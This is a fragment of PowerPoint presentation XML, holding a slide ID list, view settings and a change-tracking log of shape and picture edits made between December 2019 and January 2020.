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2.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3.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4.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5.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7.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8.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9.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0.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1.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80"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="257" r:id="rId3"/>
    <p:sldId id="258" r:id="rId4"/>
    <p:sldId id="263" r:id="rId5"/>
    <p:sldId id="264" r:id="rId6"/>
    <p:sldId id="296" r:id="rId7"/>
    <p:sldId id="342" r:id="rId8"/>
    <p:sldId id="343" r:id="rId9"/>
    <p:sldId id="259" r:id="rId10"/>
    <p:sldId id="267" r:id="rId11"/>
    <p:sldId id="270" r:id="rId12"/>
    <p:sldId id="271" r:id="rId13"/>
    <p:sldId id="272" r:id="rId14"/>
    <p:sldId id="260" r:id="rId15"/>
    <p:sldId id="273" r:id="rId16"/>
    <p:sldId id="274" r:id="rId17"/>
    <p:sldId id="298" r:id="rId18"/>
    <p:sldId id="300" r:id="rId19"/>
    <p:sldId id="299" r:id="rId20"/>
    <p:sldId id="287" r:id="rId21"/>
    <p:sldId id="275" r:id="rId22"/>
    <p:sldId id="322" r:id="rId23"/>
    <p:sldId id="305" r:id="rId24"/>
    <p:sldId id="306" r:id="rId25"/>
    <p:sldId id="307" r:id="rId26"/>
    <p:sldId id="308" r:id="rId27"/>
    <p:sldId id="309" r:id="rId28"/>
    <p:sldId id="310" r:id="rId29"/>
    <p:sldId id="311" r:id="rId30"/>
    <p:sldId id="312" r:id="rId31"/>
    <p:sldId id="313" r:id="rId32"/>
    <p:sldId id="276" r:id="rId33"/>
    <p:sldId id="291" r:id="rId34"/>
    <p:sldId id="288" r:id="rId35"/>
    <p:sldId id="289" r:id="rId36"/>
    <p:sldId id="290" r:id="rId37"/>
    <p:sldId id="261" r:id="rId38"/>
    <p:sldId id="277" r:id="rId39"/>
    <p:sldId id="278" r:id="rId40"/>
    <p:sldId id="281" r:id="rId41"/>
    <p:sldId id="282" r:id="rId42"/>
    <p:sldId id="279" r:id="rId43"/>
    <p:sldId id="283" r:id="rId44"/>
    <p:sldId id="284" r:id="rId45"/>
    <p:sldId id="285" r:id="rId46"/>
    <p:sldId id="280" r:id="rId47"/>
    <p:sldId id="292" r:id="rId48"/>
    <p:sldId id="293" r:id="rId49"/>
    <p:sldId id="294" r:id="rId50"/>
    <p:sldId id="295" r:id="rId51"/>
    <p:sldId id="265" r:id="rId52"/>
    <p:sldId id="266" r:id="rId53"/>
    <p:sldId id="301" r:id="rId54"/>
    <p:sldId id="316" r:id="rId55"/>
    <p:sldId id="317" r:id="rId56"/>
    <p:sldId id="315" r:id="rId57"/>
    <p:sldId id="318" r:id="rId58"/>
    <p:sldId id="319" r:id="rId59"/>
    <p:sldId id="320" r:id="rId60"/>
    <p:sldId id="321" r:id="rId61"/>
    <p:sldId id="323" r:id="rId62"/>
    <p:sldId id="325" r:id="rId63"/>
    <p:sldId id="326" r:id="rId64"/>
    <p:sldId id="327" r:id="rId65"/>
    <p:sldId id="328" r:id="rId66"/>
    <p:sldId id="330" r:id="rId67"/>
    <p:sldId id="329" r:id="rId68"/>
    <p:sldId id="331" r:id="rId69"/>
    <p:sldId id="332" r:id="rId70"/>
    <p:sldId id="333" r:id="rId71"/>
    <p:sldId id="335" r:id="rId72"/>
    <p:sldId id="334" r:id="rId73"/>
    <p:sldId id="336" r:id="rId74"/>
    <p:sldId id="337" r:id="rId75"/>
    <p:sldId id="338" r:id="rId76"/>
    <p:sldId id="339" r:id="rId77"/>
    <p:sldId id="341" r:id="rId78"/>
    <p:sldId id="34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037FB-9217-C847-BAEC-767188B47FC9}" v="1517" dt="2020-01-21T16:32:07.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4"/>
    <p:restoredTop sz="85359"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr>
        <p:scale>
          <a:sx n="87" d="100"/>
          <a:sy n="87" d="100"/>
        </p:scale>
        <p:origin x="1264"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Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}"/>
    <pc:docChg chg="undo custSel mod addSld delSld modSld sldOrd addMainMaster delMainMaster">
      <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-21T16:34:02.184" v="16660" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="addSp modSp mod setBg modClrScheme setClrOvrMap chgLayout">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T19:37:36.166" v="27" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3511170843" sldId="256"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T19:37:30.189" v="7" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3511170843" sldId="256"/>
            <ac:spMk id="2" creationId="{B91B3C8D-3315-D34D-9AB3-91D1DE71F0E1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T19:37:36.166" v="27" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3511170843" sldId="256"/>
            <ac:spMk id="3" creationId="{3FFB1FF2-7772-8A42-81BA-6CD018557FAA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T19:37:30.189" v="7" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3511170843" sldId="256"/>
            <ac:spMk id="9" creationId="{7319A1DD-F557-4EC6-8A8C-F7617B4CD678}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T19:37:30.189" v="7" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3511170843" sldId="256"/>
            <ac:spMk id="13" creationId="{C390A367-0330-4E03-9D5F-40308A7975C8}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T19:37:30.189" v="7" actId="26606"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3511170843" sldId="256"/>
            <ac:picMk id="4" creationId="{0CE15EF3-5473-43A5-9D59-FADA82A9417E}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="add">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T19:37:30.189" v="7" actId="26606"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3511170843" sldId="256"/>
            <ac:cxnSpMk id="11" creationId="{D28A9C89-B313-458F-9C85-515930A51A93}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod setBg setClrOvrMap">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-07T16:43:48.704" v="8888"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1838000197" sldId="257"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T19:41:50.130" v="390" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1838000197" sldId="257"/>
            <ac:spMk id="2" creationId="{7499EC0B-D54E-4C45-B3AB-B5A9AD0BF8DE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T19:40:24.462" v="358" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1838000197" sldId="257"/>
            <ac:spMk id="3" creationId="{219F5946-BB24-7B45-BE0E-70167A558051}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T19:41:50.130" v="390" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1838000197" sldId="257"/>
            <ac:spMk id="10" creationId="{103E59AE-44F8-4FB9-BF05-C888FE3E1DFA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T19:41:50.130" v="390" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1838000197" sldId="257"/>
            <ac:spMk id="14" creationId="{8B6B14AE-589A-45CC-A30D-41995FC1F8BA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="add mod modGraphic">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-07T16:43:48.704" v="8888"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1838000197" sldId="257"/>
            <ac:graphicFrameMk id="5" creationId="{3BB81B54-7D44-4797-9279-A7368579C771}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
        <pc:cxnChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T19:41:50.130" v="390" actId="26606"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1838000197" sldId="257"/>
            <ac:cxnSpMk id="12" creationId="{2752F38C-F560-47AA-90AD-209F39C04150}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod setBg setClrOvrMap">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-07T16:44:56.698" v="8901" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2017095215" sldId="258"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T19:45:14.022" v="598" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2017095215" sldId="258"/>
            <ac:spMk id="2" creationId="{E8F02054-E411-464E-87A4-B965C6F539CB}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T19:44:03.169" v="461"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2017095215" sldId="258"/>
            <ac:spMk id="3" creationId="{866BC7D1-35E5-4747-9703-8425E828FBB4}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-07T16:44:56.698" v="8901" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2017095215" sldId="258"/>
            <ac:spMk id="9" creationId="{CA44C5ED-73E7-443A-B0C4-51B695A9F464}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T19:45:14.022" v="598" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2017095215" sldId="258"/>
            <ac:spMk id="12" creationId="{F4FAA6B4-BAFB-4474-9B14-DC83A9096513}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T19:45:14.022" v="598" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2017095215" sldId="258"/>
            <ac:spMk id="16" creationId="{DB148495-5F82-48E2-A76C-C8E1C8949940}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T19:45:14.022" v="598" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2017095215" sldId="258"/>
            <ac:spMk id="21" creationId="{E844E128-FF69-4E9F-8327-6B504B3C5AE1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-07T16:44:43.317" v="8900" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2017095215" sldId="258"/>
            <ac:picMk id="3" creationId="{CA6B777E-86F8-A247-B7AB-F85B2E177B60}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod ord">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-07T16:44:12.539" v="8896" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2017095215" sldId="258"/>
            <ac:picMk id="4" creationId="{1A9D1EBA-E591-E147-AB40-7DEE95A8D321}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod ord">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-07T16:44:13.937" v="8897" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2017095215" sldId="258"/>
            <ac:picMk id="5" creationId="{3B0FF8B1-532C-CD46-878A-0BA88156FFF3}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T19:45:14.022" v="598" actId="26606"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2017095215" sldId="258"/>
            <ac:cxnSpMk id="14" creationId="{4364CDC3-ADB0-4691-9286-5925F160C2D5}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T19:45:14.022" v="598" actId="26606"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2017095215" sldId="258"/>
            <ac:cxnSpMk id="23" creationId="{055CEADF-09EA-423C-8C45-F94AF44D5AF0}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod setBg">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-02T21:18:25.194" v="8781" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1083634193" sldId="259"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-02T16:53:02.512" v="2329" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1083634193" sldId="259"/>
            <ac:spMk id="2" creationId="{CFB85931-F905-9A47-89CB-FFB16410049C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-02T21:18:25.194" v="8781" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1083634193" sldId="259"/>
            <ac:spMk id="3" creationId="{41358C87-C1A5-9742-8E57-F83EBB00F4EC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-02T16:53:08.529" v="2332"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1083634193" sldId="259"/>
            <ac:spMk id="5" creationId="{14DD8348-6CE3-0F4A-8193-8F8BA1D4C671}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T20:01:25.762" v="821" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1083634193" sldId="259"/>
            <ac:spMk id="14" creationId="{E9BA134F-37B6-498A-B46D-040B86E5DA35}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T20:01:25.762" v="821" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1083634193" sldId="259"/>
            <ac:spMk id="16" creationId="{2BFE3F30-11E0-4842-8523-7222538C8293}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:grpChg chg="add mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T20:01:25.762" v="821" actId="26606"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1083634193" sldId="259"/>
            <ac:grpSpMk id="9" creationId="{E85BB25E-96AF-CE4D-BE72-C2963F63F4FD}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T19:55:18.705" v="723" actId="164"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1083634193" sldId="259"/>
            <ac:picMk id="4" creationId="{725850E5-3D65-CE4E-ADBB-F119981C7A56}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T19:52:34.266" v="688" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1083634193" sldId="259"/>
            <ac:picMk id="5" creationId="{196B9096-E208-9246-AB78-A5C6F6BDE2AF}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T19:55:18.705" v="723" actId="164"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1083634193" sldId="259"/>
            <ac:picMk id="6" creationId="{C4428452-104C-6547-B4CB-20030386B85F}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod modCrop">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T19:55:18.705" v="723" actId="164"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1083634193" sldId="259"/>
            <ac:picMk id="7" creationId="{28B159E7-DBE1-9241-B71A-6FFE6EE62871}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T19:55:18.705" v="723" actId="164"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1083634193" sldId="259"/>
            <ac:picMk id="8" creationId="{EFF87799-01FB-EA44-9DE6-E0393FAC6D4A}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="add">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T20:01:25.762" v="821" actId="26606"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1083634193" sldId="259"/>
            <ac:cxnSpMk id="18" creationId="{67E7D319-545A-41CD-95DF-4DE4FA8A46B1}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add mod setBg setClrOvrMap">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T20:05:50.205" v="1116" actId="207"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2816277804" sldId="260"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T20:05:28.999" v="1114" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2816277804" sldId="260"/>
            <ac:spMk id="2" creationId="{7C9FC58D-3F35-1849-A5F9-EEF39A151384}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T20:05:50.205" v="1116" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2816277804" sldId="260"/>
            <ac:spMk id="3" creationId="{E938A14F-D9FC-F646-9086-E5746E023A84}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T20:05:28.999" v="1114" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2816277804" sldId="260"/>
            <ac:spMk id="9" creationId="{E844E128-FF69-4E9F-8327-6B504B3C5AE1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T20:05:28.999" v="1114" actId="26606"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2816277804" sldId="260"/>
            <ac:picMk id="4" creationId="{B76E1C03-2DE4-0544-8FDF-31BBD50BEF27}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="add">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T20:05:28.999" v="1114" actId="26606"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2816277804" sldId="260"/>
            <ac:cxnSpMk id="11" creationId="{055CEADF-09EA-423C-8C45-F94AF44D5AF0}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod setBg setClrOvrMap">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T20:20:57.052" v="1383" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1746601606" sldId="261"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T20:20:57.052" v="1383" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1746601606" sldId="261"/>
            <ac:spMk id="2" creationId="{FCFBE075-A9D6-4642-A4EF-5015BCE88301}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T20:20:53.045" v="1382" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1746601606" sldId="261"/>
            <ac:spMk id="3" creationId="{D423FBA8-8D99-B74F-832C-54523A1F8AC2}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T20:19:50.769" v="1378" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1746601606" sldId="261"/>
            <ac:spMk id="9" creationId="{F4FAA6B4-BAFB-4474-9B14-DC83A9096513}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T20:19:50.769" v="1378" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1746601606" sldId="261"/>
            <ac:spMk id="13" creationId="{DB148495-5F82-48E2-A76C-C8E1C8949940}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T20:19:50.769" v="1378" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
